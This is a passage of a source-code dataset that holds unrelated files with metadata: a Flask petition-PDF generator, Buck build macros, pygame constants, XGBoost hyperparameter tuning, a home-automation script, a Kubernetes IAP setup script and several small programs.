\"\"\")\r\n modHTML.close()\r\n\r\n peticionAdd = request.form.get('peticiones')\r\n \r\n fecha_peticion = request.form.get('fecha_peticion')\r\n print(fecha_peticion)\r\n asunto_peticion = request.form.get('asunto_peticion')\r\n ciudad_peticion = request.form.get('ciudad_peticion')\r\n\r\n nom_peticionario = request.form.get('nom_peticionario').upper()\r\n \r\n id_peticionario = request.form.get('id_peticionario')\r\n ced_peticionario = request.form.get('ced_peticionario').replace('.','').replace(\",\",\"\")\r\n id_expedicion = request.form.get('id_expedicion')\r\n direccion_peticionario = request.form.get('direccion_peticionario') \r\n email_peticionario = request.form.get('email_peticionario')\r\n\r\n gen_peticionario = request.form.get('gen_peticionario')\r\n gen_peticionario = 'o' if gen_peticionario == 'm' else 'a'\r\n\r\n id_calidad = request.form.get('id_calidad')\r\n\r\n representada = request.form.get('representada')\r\n dirigido = request.form.get('dirigido')\r\n\r\n direccion_peticionado = request.form.get('direccion_peticionado') \r\n email_peticionado = request.form.get('email_peticionado')\r\n\r\n hechos_peticion = request.form.get('hechosAdd')\r\n\r\n \r\n\r\n derechoPeticion = f\"\"\"{ciudad_peticion} {fecha_peticion} \r\n \r\nSeñores. \r\n{dirigido} \r\n{direccion_peticionado} \r\n{email_peticionado} \r\n \r\nReferencia: Derecho de Petición de {nom_peticionario} a {dirigido} para {asunto_peticion} \r\n \r\n{nom_peticionario}, identificad{gen_peticionario} con {id_peticionario} número {ced_peticionario} de {id_expedicion}, en calidad de {id_calidad}; de conformidad con el artículo 23 de la Constitución Política de Colombia de 1991, y del título segundo de la parte primera del Código de Procedimiento Administrativo y de lo Contencioso Administrativo (Ley 1437 de 2011); interpongo el siguiente Derecho de Petición basado en los siguientes: \r\n \r\n\r\nI) Hechos. \r\n \r\n{hechos_peticion} \r\n \r\n\r\nII) Petición. \r\n\r\nEn mérito de lo expuesto, se solicita a {dirigido} que: \r\nPetición \r\n{peticionAdd} \r\n \r\nIII) Notificaciones. \r\n \r\nSe podrá notificar en cualquiera de las siguientes direcciones. \r\n \r\n{direccion_peticionario} \r\n \r\n{email_peticionario} \r\n \r\n \r\nIV) Firma. \r\n \r\nEl presente documento se suscribe de conformidad con el artículo 7 de la Ley 527 de 1999, y con la presunción contemplada en el artículo 244 de la Ley 1564 de 2012 (Código General del Proceso). \r\n\r\n \r\n\r\nSin otro particular, \r\n\r\n{nom_peticionario} \r\n{id_peticionario} número {ced_peticionario}\"\"\"\r\n\r\n\r\n\r\n class MyFPDF(FPDF, HTMLMixin):\r\n pass\r\n\r\n pdf = MyFPDF()\r\n pdf.set_margins(left= 15.0, top=12.5, right=15.0)\r\n pdf.add_page()\r\n pdf.write_html(derechoPeticion)\r\n pdf.output('peticion_'+nom_peticionario[:4]+ced_peticionario[:-3]+'.pdf', 'F')\r\n\r\n \r\n modHTML = open(\"./templates/form_peticion.html\",\"a\")\r\n modHTML.write (derechoPeticion)\r\n modHTML.write(\"\"\"\r\n \r\n\r\n {%endblock%}\"\"\")\r\n modHTML.close()\r\n\r\n return(nom_peticionario, ced_peticionario, derechoPeticion)\r\n\r\n","sub_path":"peticion.py","file_name":"peticion.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"506102196","text":"\"\"\"\nWe want to be able to use packages of files, fetched from an external data\nstore, for in-repo builds. Conceptually, this is pretty simple:\n - The repo stores an address and a cryptographic hash of the package.\n - There's a build target that fetches the package, checks the hash, and\n presents the package contents as an `image.layer`.\n\nThe above process is repo-hermetic (unless the package is unavailable), and\nlets repo builds use pre-built artifacts. Such artifacts bring two benefits:\n - Speed: we can explicitly cache large, infrequently changed artifacts.\n - Controlled API churn: I may want to use a \"stable\" version of my\n dependency, rather than whatever I might build off trunk.\n\nThe details of \"how to fetch a package\" will vary depending on the package\nstore. This is abstracted by `_PackageFetcherInfo` below.\n\nThe glue code in this file specifies a uniform way of exposing package\nstores as Buck targets. Its opinions are, roughly:\n\n - The data store has many versions of the package, each one immutable.\n New versions keep getting added. However, a repo checkout may only\n access some fixed versions of a package via \"tags\". Each (package, tag)\n pair results in a completely repo-deterministic `image.layer`.\n\n - In the repo, a (package, tag) pair is an `image.layer` target in a\n centralized repo location.\n\n - The layer's mount info has a correctly populated `runtime_source`, so if\n another layer mounts it at build-time, then this mount can be replicated\n at runtime.\n\n - Two representations are provided for the in-repo package database:\n performant `.bzl` and merge-conflict-free \"json dir\".\n\nMost users should use the performant `.bzl` database format, as follows:\n\n # pkg/pkg.bzl\n def _fetched_layer(name, tag = \"stable\"):\n return \"//pkg/db:\" + name + \"/\" + tag + \"-USE-pkg.fetched_layer\"\n pkg = struct(fetched_layer = _fetched_layer)\n\n # pkg/db/db.bzl\n package_db = {\"package\": {\"tag\": {\"address\": ..., \"hash\", ...}}\n\n # pkg/db/TARGETS\n load(\":db.bzl\", \"package_db\")\n fetched_package_layers_from_db(\n fetcher = {\n \"extra_deps\": [\"`image.source` \"generator\" to download package\"],\n \"fetch_package\": \"writes `tarball`/`install_files` JSON to stdout\",\n \"print_mount_config\": \"adds package address to `runtime_source`\",\n },\n package_db = package_db,\n target_suffix = \"-USE-pkg.fetched_layer\",\n )\n\nNow you can refer to a stable version of a package, represented as an\n`image.layer`, via `pkg.fetched_layer(\"name\")`.\n\n## When to use the \"json dir\" DB format?\n\nWith a `.bzl` database, the expected use-case is that there is a single,\ncentralized automation that synchronizes the in-repo package-tag map with\nthe external source of truth for packages and their tags.\n\nIf you expect some packages to be updated by other, independent automations,\nthen it is no longer a good idea to store all packages in a single file --\nmerge conflicts will cause all these automations to break.\n\nThe \"json dir\" DB format is free of merge conflicts, so long as\neach package-tag pair is only update by one automation.\n\nTo get the best of both worlds, use this pattern:\n - All \"normal\" packages are stored in a `.bzl` database and have one\n automation to update all packages in bulk.\n - Special packages (fewer in quantity) live in a \"json dir\" database.\n\"\"\"\n\nload(\"@bazel_skylib//lib:paths.bzl\", \"paths\")\nload(\"@bazel_skylib//lib:shell.bzl\", \"shell\")\nload(\"@bazel_skylib//lib:types.bzl\", \"types\")\nload(\"//fs_image/bzl:oss_shim.bzl\", \"buck_genrule\", \"get_visibility\")\nload(\"//fs_image/bzl/image_actions:feature.bzl\", \"private_do_not_use_feature_json_genrule\")\nload(\":image_layer.bzl\", \"image_layer\")\nload(\":target_tagger.bzl\", \"normalize_target\")\n\n_PackageFetcherInfo = provider(fields = [\n # This executable target prints a feature JSON responsible for\n # configuring the entire layer to represent the fetched package,\n # including file data, owner, mode, etc.\n #\n # See each fetcher's in-source docblock for the details of its contract.\n \"fetch_package\",\n # The executable target `fetch_package` may reference other targets\n # (usually tagged via __BUCK_TARGET or similar) in their features. Any\n # such target must ALSO be manually added to `extra_deps` so that\n # `image_layer.bzl` can resolve those dependencies correctly.\n \"extra_deps\",\n # An executable target that defines `runtime_source` and\n # `default_mountpoint` for the `mount_config` of the package layer.\n \"print_mount_config\",\n])\n\n# Read the doc-block for the purpose and high-level usage.\ndef fetched_package_layers_from_bzl_db(\n # `{\"package\": {\"tag\": }}` -- you would normally get\n # this by `load`ing a autogenerated `db.bzl` exporting just 1 dict.\n package_db,\n # Dict of `_PackageFetcherInfo` kwargs\n fetcher,\n # Layer targets will have the form `/`.\n # See `def _fetched_layer` in the docblock for the intended usage.\n target_suffix,\n visibility = None):\n for package, tags in package_db.items():\n for tag, how_to_fetch in tags.items():\n _fetched_package_layer(\n name = package + \"/\" + tag + target_suffix,\n package = package,\n how_to_fetch = how_to_fetch,\n fetcher = fetcher,\n visibility = visibility,\n )\n\n# Read the doc-block for the purpose and high-level usage.\ndef fetched_package_layers_from_json_dir_db(\n # Path to a database directory inside the current project (i.e.\n # relative to the parent of your TARGETS file).\n package_db_dir,\n # Dict of `_PackageFetcherInfo` kwargs\n fetcher,\n # Layer targets will have the form `/`.\n # See `def _fetched_layer` in the docblock for the intended usage.\n target_suffix,\n visibility = None):\n # Normalizing lets us treat `package_dir_db` as a prefix. It also\n # avoids triggering a bug in Buck, causing it to silently abort when a\n # glob pattern starts with `./`.\n package_db_prefix = paths.normalize(package_db_dir) + \"/\"\n suffix = \".json\"\n for p in native.glob([package_db_prefix + \"*/*\" + suffix]):\n if not p.startswith(package_db_prefix) or not p.endswith(suffix):\n fail(\"Bug: {} was not {}*/*{}\".format(p, package_db_prefix, suffix))\n package, tag = p[len(package_db_prefix):-len(suffix)].split(\"/\")\n export_file(name = p)\n _fetched_package_layer(\n name = package + \"/\" + tag + target_suffix,\n package = package,\n how_to_fetch = \":\" + p,\n fetcher = fetcher,\n visibility = visibility,\n )\n\n# Instead of using this stand-alone, use `fetched_package_layers_from_db` to\n# define packages uniformly in one project. This ensures each package is\n# only fetched once.\ndef _fetched_package_layer(\n name,\n package,\n # One of two options:\n # - A JSONable dict describing how to fetch the package instance.\n # - A string path to a target whose output has a comment on the\n # first line, and JSON on subsequent lines.\n how_to_fetch,\n # Dict of `_PackageFetcherInfo` fields, documented above.\n fetcher,\n visibility = None):\n fetcher = _PackageFetcherInfo(**fetcher)\n visibility = get_visibility(visibility, name)\n if types.is_dict(how_to_fetch):\n print_how_to_fetch_json = \"echo \" + shell.quote(\n struct(**how_to_fetch).to_json(),\n )\n elif types.is_string(how_to_fetch):\n print_how_to_fetch_json = \"tail -n +3 $(location {})\".format(\n how_to_fetch,\n )\n else:\n fail(\"`how_to_fetch` must be str/dict, not {}\".format(how_to_fetch))\n\n package_feature = name + \"-fetched-package-feature\"\n private_do_not_use_feature_json_genrule(\n name = package_feature,\n deps = [\n # We want to re-fetch packages if the fetching mechanics change.\n # `def fake_macro_library` has more details.\n \"//fs_image/bzl:fetched_package_layer\",\n ] + fetcher.extra_deps,\n output_feature_cmd = \"\"\"\n {print_how_to_fetch_json} |\n $(exe {fetch_package}) {quoted_package} {quoted_target} > \"$OUT\"\n \"\"\".format(\n fetch_package = fetcher.fetch_package,\n quoted_package = shell.quote(package),\n quoted_target = shell.quote(normalize_target(\":\" + name)),\n print_how_to_fetch_json = print_how_to_fetch_json,\n ),\n visibility = visibility,\n )\n\n mount_config = name + \"-fetched-package-mount-config\"\n buck_genrule(\n name = mount_config,\n out = \"partial_mountconfig.json\", # It lacks `build_source`, e.g.\n bash = '''\n {print_how_to_fetch_json} |\n $(exe {print_mount_config}) {quoted_package} > \"$OUT\"\n '''.format(\n print_mount_config = fetcher.print_mount_config,\n quoted_package = shell.quote(package),\n print_how_to_fetch_json = print_how_to_fetch_json,\n ),\n )\n\n image_layer(\n name = name,\n features = [\":\" + package_feature],\n mount_config = \":\" + mount_config,\n visibility = visibility,\n )\n","sub_path":"fs_image/bzl/fetched_package_layer.bzl","file_name":"fetched_package_layer.bzl","file_ext":"bzl","file_size_in_byte":9382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"103563875","text":"import pygame as pg\nimport sys\nimport json\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"map\", type=str,\n help=\"Map to load, json file in map directory without extention Ex: blocks\")\nparser.add_argument(\"-ff\", \"--friendlyFire\", action=\"store_true\",\n help=\"Turn on friendly fire\")\nargs = parser.parse_args()\n\n\nwith open (f'maps/{args.map}.json') as f:\n data = json.load(f)\n\n\nMAP_WIDTH = data['width']\nMAP_HEIGHT = data['height']\nscreen = pg.display.set_mode((MAP_WIDTH, MAP_HEIGHT))\nMAP_BACKGROUND = data['background']\nobstacles = data['obstacles']\nplayers = data['players']\nscoreboard = data['scoreboard']\n\nTANK_SIZE = (50, 50)\nTANK_MAX_SPEED = 4\nTANK_MAX_ROTATION = 7\nTANK_FONT = 'Times New Roman'\nTANK_FONT_SIZE = 32\nSELECTED_COLOR = (0,234,0)\nFPS = 30\nSELECT_ADD_TIME = 500 # milliseconds\nBACKGROUND_COLOR = (59, 113, 55)\nBACKGROUND_SIZE = 120 # must be square\nFLAG_SIZE = 25\nFRIENDLY_FIRE = args.friendlyFire\nBULLET_SIZE = 6\nBULLET_SPEED = 10\nRESPAWN_TIME = 5000\nPOINTS_CARRYING_FLAG = 1\nPOINTS_RETURNING_FLAG = 100\nONE_SECOND = 1000\nAI_UPDATE_TIMEOUT = 333 # lower is more frequent","sub_path":"gameConsts.py","file_name":"gameConsts.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"525937670","text":"import numpy as np\nimport xgboost as xgb\nfrom sklearn.metrics import make_scorer\nimport hyperopt\nfrom hyperopt import fmin, tpe, hp, Trials, STATUS_OK, STATUS_FAIL\nfrom functools import partial\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import TimeSeriesSplit, train_test_split, cross_val_score, KFold, cross_validate\n\ndef fit_xgb(params, X_train, y_train, seed=42):\n n_estimators = int(params[\"n_estimators\"])\n max_depth= int(params[\"max_depth\"])\n\n try:\n model = xgb.XGBRegressor(n_estimators=n_estimators,\n max_depth=max_depth,\n learning_rate=params[\"learning_rate\"],\n subsample=params[\"subsample\"], \n seed=seed)\n \n result = model.fit(X_train,\n y_train.values.ravel(),\n eval_set=[(X_train, y_train.values.ravel())],\n early_stopping_rounds=50,\n verbose=False)\n\n return {\n \"status\": STATUS_OK,\n \"models\": [model]\n }\n\n except ValueError as ex:\n return {\n \"error\": ex,\n \"status\": STATUS_FAIL\n }\n\ndef train_xgb(params, X_train, y_train, cv, scorer='neg_mean_squared_error', seed=42):\n \"\"\"\n Train XGBoost regressor using the parameters given as input. The model\n is validated using standard cross validation technique adapted for time series\n data. This function returns a friendly output for the hyperopt parameter optimization\n module.\n\n Parameters\n ----------\n params: dict with the parameters of the XGBoost regressor. For complete list see:\n https://xgboost.readthedocs.io/en/latest/parameter.html\n X_train: pd.DataFrame with the training set features\n y_train: pd.Series with the training set targets\n\n Returns\n -------\n dict with keys 'model' for the trained model, \n 'status' containing the hyperopt,\n status string,\n and 'loss' with the RMSE obtained from cross-validation\n \"\"\"\n\n n_estimators = int(params[\"n_estimators\"])\n max_depth= int(params[\"max_depth\"])\n\n try:\n model = xgb.XGBRegressor(n_estimators=n_estimators,\n max_depth=max_depth,\n learning_rate=params[\"learning_rate\"],\n subsample=params[\"subsample\"], \n seed=seed)\n\n \n #result = model.fit(X_train,\n # y_train.values.ravel(),\n # eval_set=[(X_train, y_train.values.ravel())],\n # early_stopping_rounds=50,\n # verbose=False)\n\n fit_params = {\n 'eval_set': [(X_train, y_train.values.ravel())],\n 'early_stopping_rounds': 50,\n 'verbose': False\n }\n\n return_estimator = False\n cv_score = cross_validate(\n model,\n X_train, y_train.values.ravel(),\n cv=cv,\n scoring=scorer,\n return_estimator=return_estimator,\n fit_params=fit_params\n )\n\n scores = np.abs(np.array(cv_score['test_score']))\n avg_score = np.mean(scores)\n return {\n \"loss\": avg_score,\n \"scores\": scores,\n \"status\": STATUS_OK,\n #\"models\": cv_score['estimator']\n }\n\n except ValueError as ex:\n return {\n \"error\": ex,\n \"status\": STATUS_FAIL\n }\n\ndef optimize_xgb(X_train, y_train, max_evals=10, cv=None, scorer='neg_mean_squared_error', seed=42):\n \"\"\"\n Run Bayesan optimization to find the optimal XGBoost algorithm\n hyperparameters.\n\n Parameters\n ----------\n X_train: pd.DataFrame with the training set features\n y_train: pd.Series with the training set targets\n max_evals: the maximum number of iterations in the Bayesian optimization method\n\n Returns\n -------\n best: dict with the best parameters obtained\n trials: a list of hyperopt Trials objects with the history of the optimization\n \"\"\"\n assert cv is not None\n\n space = {\n \"n_estimators\": hp.quniform(\"n_estimators\", 100, 1000, 10),\n \"max_depth\": hp.quniform(\"max_depth\", 1, 8, 1),\n \"learning_rate\": hp.loguniform(\"learning_rate\", -5, 1),\n \"subsample\": hp.uniform(\"subsample\", 0.8, 1),\n \"gamma\": hp.quniform(\"gamma\", 0, 100, 1)\n }\n\n objective_fn = partial(train_xgb,\n X_train=X_train, y_train=y_train, \n scorer=scorer, \n cv=cv,\n seed=seed)\n\n trials = Trials()\n best = fmin(fn=objective_fn,\n space=space,\n algo=tpe.suggest,\n max_evals=max_evals,\n trials=trials)\n\n # evaluate the best model on the test set\n return best, trials\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"122632343","text":"from coinbase_commerce.util import register_resource_cls\nfrom .base import (\n CreateAPIResource,\n DeleteAPIResource,\n ListAPIResource,\n UpdateAPIResource,\n)\n\n__all__ = (\n 'Checkout',\n)\n\n\n@register_resource_cls\nclass Checkout(ListAPIResource,\n CreateAPIResource,\n UpdateAPIResource,\n DeleteAPIResource):\n RESOURCE_PATH = \"checkouts\"\n RESOURCE_NAME = \"checkout_aio\"\n","sub_path":"coinbase_commerce/aio/api_resources/checkout.py","file_name":"checkout.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"415124368","text":"import os\n\n\nclass doc(object):\n \"\"\"表示单个文档\"\"\"\n\n def __init__(self, doc_path, return_sents_list=False):\n self.doc_path = doc_path\n self.id_, _ = os.path.splitext(os.path.basename(doc_path))\n self.return_sents_list = return_sents_list\n\n with open(doc_path) as f:\n self._process_lines(f.readlines())\n\n def _process_lines(self, lines):\n highlight_count = 0\n sents = []\n for line in lines:\n if line.startswith(\"@highlight\"):\n highlight_count += 1\n elif line == \"\\n\":\n continue\n else:\n sents.append(line.strip('\\n').lower())\n if not self.return_sents_list:\n self.article = \" \".join(sents[:-highlight_count])\n self.abstract = \" \".join(sents[-highlight_count:])\n else:\n self.article = sents[:-highlight_count]\n self.abstract = sents[-highlight_count:]\n\n\n def out(self, tf_score):\n \"\"\"打印出摘要 以及id\"\"\"\n print(\"ID: \", self.id_)\n print(\"SCORE: \", tf_score)\n print(\"*\"*25 + '\\n' + self.abstract + '\\n' + \"*\"*25)\n print('\\n\\n')\n","sub_path":"Doc.py","file_name":"Doc.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"69268321","text":"import sys\nimport os\nimport time\n\nimport pinger\nimport sun\n\nsys.path.insert(0, \"/home/uad/Programming/database-gspreadsheet/\")\nimport db_ev\n\n\ndef turn_on():\n\tos.system(\"k1\")\n\tdb_ev.write(\"k\",True)\n\ndef turn_off():\n\tos.system(\"k0\")\n\tdb_ev.write(\"k\",False)\n\n\nip = \"192.168.1.27\"\nyour_city = \"Ankara\"\n\n\n\nif(pinger.is_online(ip)):\n\tif(not(sun.is_shining(your_city))):\n\t\twhile(db_ev.read(\"is_at_home\") == \"0\"):\n\t\t\tprint(\"welcome home\")\n\t\t\tturn_on()\n\t\t\tdb_ev.write(\"is_at_home\",True)\n\telse:\n\t\tprint(\"shining\\nno need to turn on\")\n\t\t#turn_off()\nelse:\n\tprint(\"not at home\")\n\twhile(db_ev.read(\"is_at_home\") == \"1\"):\t\n\t\tprint(\"goodbye\")\t\n\t\tturn_off()\n\t\tdb_ev.write(\"is_at_home\",False)\n\n","sub_path":"command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"400459531","text":"from game.deck import Deck\nfrom game.hand import Hand\nfrom game.table import Table\nfrom game.player import Player, STATUS_CODE\n\nclass Game:\n def __init__(self, *players): # players like this ([id, name], [id, name] , ...)\n self.deck = Deck()\n self.players = self.init_players(players)\n self.first = self.players[0] if self.players[0].status is 1 else self.players[1]\n self.table = Table([], [])\n\n def init_players(self, players):\n _r = []\n for player in players:\n hand = Hand(*self.deck.give(6))\n _id = player[0]\n name = player[1]\n _r.append(Player(_id, name, STATUS_CODE[0], hand))\n\n if _r[0].hand.small_trump is False and _r[1].hand.small_trump is False:\n self.deck = Deck()\n self.players = self.init_players(players)\n\n st = _r[0].hand.small_trump < _r[1].hand.small_trump\n _r[0].status = 1 if st else 0\n _r[1].status = 0 if st else 1\n\n return _r\n\n def move(self, player, card):\n self[player].hand -= card\n self.table += card\n\n def respond(self, player):\n _r = []\n for cs in self[player].hand:\n if cs.isstrong(self.table[-1]):\n _r.append(cs)\n return _r\n\n def take(self, player):\n self[player].hand.take(*self.table)\n self.table.flush()\n self[player].status = 2\n self[2 - (player + 1)].status = 1\n\n def give_from_deck(self, player):\n l = len(self[player].hand)\n if len(self.deck) > 6 - l:\n self[player].hand.take(*self.deck.give(6 - l))\n elif len(self.deck) < 6 - l and self.deck:\n self[player].hand.take(*self.deck.give(len(self.deck)))\n\n def game_end(self):\n l = len(self[0].hand) - len(self[1].hand)\n return 0 if l >= 0 else 1\n\n def __iter__(self):\n for i in self.players:\n yield i\n\n def __getitem__(self, key):\n return self.players[key]\n","sub_path":"game/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"321106879","text":"#!/usr/bin/env python3\n\"\"\"\nScript that creates a sample file\nto be used as input on run_setup of query_builder\n\"\"\"\nimport inspect\nimport json\nimport os\nimport time\nfrom collections import namedtuple\nfrom contextlib import contextmanager\nfrom datetime import datetime\n\nimport click\nimport timeout_decorator\nfrom colorama import init\n\nimport helpers\nfrom base import LOGGER\nfrom compute_handler import get_backend_service_id\nfrom kubernetes_handler import (\n delete_configmap,\n get_cluster_credentials,\n patch_deployment)\nfrom setup_iap import setup_iap\nfrom simulation_mode import simulation_wall\n\ninit()\n\n\n@click.command()\n@click.option('--input-file',\n help='Input file', required=True)\n@click.option('--simulation/--no-simulation',\n default=True,\n help='Simulate the execution. Do not execute any command.')\ndef run_query_builder_iap_setup(simulation, input_file):\n \"\"\" run query builder setup \"\"\"\n with simulation_wall(simulation):\n try:\n query_builder_input = parse_input_json(input_file)\n helpers_config(simulation)\n click.echo(\"Input file read from [{}]\".format(input_file))\n except FileNotFoundError as not_found:\n click.echo(\"File [{0}] not found.\".format(not_found.filename))\n except json.decoder.JSONDecodeError as err:\n click.echo(\"Error parsing file [{0}].\\n{1}\"\n .format(input_file, err))\n with instruction_separator(\"Cluster Credentials\"):\n get_cluster_credentials(\n query_builder_input.query_builder.project_id,\n query_builder_input.cluster.cluster_name,\n query_builder_input.query_builder.compute_zone\n )\n\n check_load_balancer(query_builder_input)\n\n with instruction_separator(\"IAP\", \"Turning on\"):\n delete_configmap(\"iap-config\")\n\n setup_iap(query_builder_input.query_builder.project_id,\n query_builder_input.oauth.client_id,\n query_builder_input.oauth.client_secret,\n query_builder_input.cluster.timeout)\n\n with instruction_separator(\"Frontend Deployment\", \"Patching\"):\n frontend_deployment = \"frontend\"\n path_value = '\"{\\\\\"spec\\\\\":{\\\\\"template\\\\\":{\\\\\"metadata\\\\\":{\\\\\"annotations\\\\\":{\\\\\"date\\\\\":\\\\\"'+ datetime.utcnow().strftime('%Y%m%d%H%M%S') + '\\\\\"}}}}}\"'\n patch_deployment(frontend_deployment, path_value)\n\n\n@contextmanager\ndef instruction_separator(step, action=\"Creating\"):\n \"\"\"Add a message at the start and end of the log messages of the step\"\"\"\n click.echo()\n click.secho('{:-^60}'.format((\"{} {}\".format(action, step))), bold=True)\n try:\n yield\n click.secho('{:-^60}'.format((\"{} finished successfully\".format(step))),\n fg='green')\n except StopIteration as err:\n LOGGER.exception(\"Timeout error\")\n click.secho('{:-^60}'.format((\"Timeout {} {}\".format(action, step))),\n err=True, fg='red')\n raise ValueError(str(err))\n except Exception: # pylint: disable=W0703\n LOGGER.exception(\"error\")\n click.secho('{:-^60}'.format((\"Problem {} {}\".format(action, step))),\n err=True, fg='red')\n\n\n@timeout_decorator.timeout(1800, timeout_exception=StopIteration)\ndef check_load_balancer(query_builder_input):\n \"\"\" \"\"\"\n with instruction_separator(\"Load Balancer\", \"Checking\"):\n backend_service = get_backend_service_id(\n query_builder_input.query_builder.project_id,\n \"frontend\"\n )\n while not backend_service:\n click.echo(\"Waiting for Load Balancer\")\n if backend_service == \"\":\n time.sleep(60)\n backend_service = get_backend_service_id(\n query_builder_input.query_builder.project_id,\n \"frontend\"\n )\n\n\ndef parse_input_json(input_file):\n \"\"\" Parse input json \"\"\"\n with open(input_file, 'r', encoding='utf-8') as infile:\n return json.loads(\n infile.read(),\n object_hook=lambda d: namedtuple('QB', d.keys())(*d.values())\n )\n\n\ndef helpers_config(simulation):\n \"\"\" setup helper variables \"\"\"\n helpers.START_TIME = datetime.utcnow().strftime('%Y%m%d%H%M')\n helpers.DRY_RUN = simulation\n helpers.BASE_DIR = os.path.join(os.path.dirname(\n os.path.abspath(inspect.stack()[0][1])))\n\n\nif __name__ == '__main__':\n run_query_builder_iap_setup() # pylint: disable=no-value-for-parameter\n","sub_path":"securitycenter/query-builder/setup/run_query_builder_iap_setup.py","file_name":"run_query_builder_iap_setup.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"563041147","text":"# Runs on Leetcode\n # Bruteforce \n # Runtime - O(nk) where k is number of lists and n is length of lists\n # Memory - O(1) - no extra space used\n \n # Optimized\n # Runtime - O(nlogk) n and k are same as above\n # Memory - O(1) excluding the resultant linked list space\n\n \n \n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\n\n# Bruteforce\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n if not l1:\n return l2\n if not l2:\n return l1\n dummy = ListNode(float('-inf'))\n result = dummy\n while l1 and l2:\n if l1.val < l2.val:\n dummy.next = l1\n dummy = dummy.next\n l1 = l1.next\n dummy.next = None\n else:\n dummy.next = l2\n dummy = dummy.next\n l2 = l2.next\n dummy.next = None\n if l1:\n dummy.next = l1\n if l2:\n dummy.next = l2\n return result.next\n \n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n merged = ListNode(float('-inf'))\n result = merged\n if not lists:\n return merged.next\n i = 0\n while i < len(lists):\n if lists[i]:\n merged = self.mergeTwoLists(merged, lists[i])\n i += 1\n return result.next\n\n\n\n\n# Optimized\n\nclass Solution:\n import heapq\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n dummy = result = ListNode(float('-inf'))\n queue = []\n\n for i in range(len(lists)):\n if lists[i]:\n heapq.heappush(queue, (lists[i].val, i ,lists[i]))\n \n while queue:\n node_val, index, node = heapq.heappop(queue)\n dummy.next = ListNode(node_val)\n dummy = dummy.next\n node = node.next\n if node:\n heapq.heappush(queue, (node.val, index, node))\n return result.next\n","sub_path":"Merge_K_sorted_lists.py","file_name":"Merge_K_sorted_lists.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"506759017","text":"initialInvestment = float(input (\"How much are you going to invest\"))\r\nterm = float(input (\"How many years are you going to invest the money?\"))\r\ninterestRate = float(input (\"Input the annual interest rate as a decimal. {For 2% enter .02}\"))\r\n\r\nx = 1\r\nprint (\"Month\\tInterest Earned\\tTotal\")\r\nwhile x < (term*12+1):\r\n interestEarned = initialInvestment * (interestRate/12)\r\n initialInvestment = interestEarned + initialInvestment\r\n print (x , \"\\t\", \"$\", \"{:.2f}\".format(interestEarned)), \"\\t\", \"$\", \"{:.2f}\".format(initialInvestment)\r\n x = x + 1\r\n\r\n","sub_path":"compound.py","file_name":"compound.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"401199389","text":"from typing import Tuple\nfrom numpy.core.records import record\nimport jittor as jt\nfrom datasets.query_datasets import QueryDataset \nfrom datasets.shape_datasets import ShapeDataset\nimport tqdm\nimport jittor.transform as transform\nimport os\n# from tensorboardX import SummaryWriter\nimport warnings\nfrom utils import read_json\nfrom PIL import Image\nfrom RetrievalNet import RetrievalNet\nwarnings.filterwarnings('ignore')\nfrom Models import RetrievalNet\n\nimport numpy as np\nimport binvox_rw\nfrom sklearn.metrics.pairwise import pairwise_distances\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"3\"\n\nimport shutil\nfrom sklearn import manifold\nimport matplotlib.pyplot as plt\nimport time\n\n\n\nimport multiprocessing\nfrom contextlib import contextmanager\n\n\ndef averaged_hausdorff_distance(set1, set2, max_ahd=np.inf):\n \"\"\"\n Compute the Averaged Hausdorff Distance function\n between two unordered sets of points (the function is symmetric).\n Batches are not supported, so squeeze your inputs first!\n :param set1: Array/list where each row/element is an N-dimensional point.\n :param set2: Array/list where each row/element is an N-dimensional point.\n :param max_ahd: Maximum AHD possible to return if any set is empty. Default: inf.\n :return: The Averaged Hausdorff Distance between set1 and set2.\n\n from: https://github.com/HaipengXiong/weighted-hausdorff-loss/blob/master/object-locator/losses.py\n \"\"\"\n\n if len(set1) == 0 or len(set2) == 0:\n return max_ahd\n\n set1 = np.array(set1)\n set2 = np.array(set2)\n\n assert set1.ndim == 2, 'got %s' % set1.ndim\n assert set2.ndim == 2, 'got %s' % set2.ndim\n\n assert set1.shape[1] == set2.shape[1], \\\n 'The points in both sets must have the same number of dimensions, got %s and %s.'\\\n % (set2.shape[1], set2.shape[1])\n\n d2_matrix = pairwise_distances(set1, set2, metric='euclidean')\n\n res = np.average(np.min(d2_matrix, axis=0)) + \\\n np.average(np.min(d2_matrix, axis=1))\n\n return res/2\n\n\n\n\nclass Retrieval(object):\n '''\n ColorTransfer\n load\n save\n '''\n def __init__(self, config):\n self.cfg =config\n self.retrieval_net = 